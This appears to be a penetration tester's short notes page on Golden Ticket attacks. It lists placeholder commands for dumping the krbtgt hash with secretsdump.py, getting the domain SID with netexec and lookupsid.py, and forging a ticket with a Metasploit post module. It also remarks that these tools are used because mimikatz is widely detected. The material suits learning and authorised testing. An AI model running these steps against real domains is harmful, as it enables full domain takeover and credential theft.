Golden Ticket Attacks
When we compromise the krbtgt account, we own the domain. We can then request any resource or system on the domain. A Golden Ticket gives us complete access to every machine.
We can use Secretsdump and Netexec to get the information we need, as mimikatz is caught everywhere now:
Hashes
Secretsdump.py
krbtgt hash
We can dump the NTDS.dit to get the hash
$ secretsdump.py [domain]/[username]:'[password]'@[dc-ip] -just-dc-ntlmDomain SID
Netexec
we can use the ldap protocol to get the domain SID:
$ nxc ldap [dc-ip] -u '[username]' -p '[password]' --get-sidlookupsid.py
$ lookupsid.py -hashes '[hash]' '[domain]/[username]@[DC FQDN]' 0Forge the Golden Ticket
I was having trouble getting ticketer.py to generate the Golden Ticket, but I was able to generate and apply one to a session with Metasploit's module: post/windows/escalate/golden_ticket After getting a meterpreter session, background it, use this post module, fill in the options and set use to true before running.
Switch back to meterpreter session, use shell and then klist to list tickets
Last updated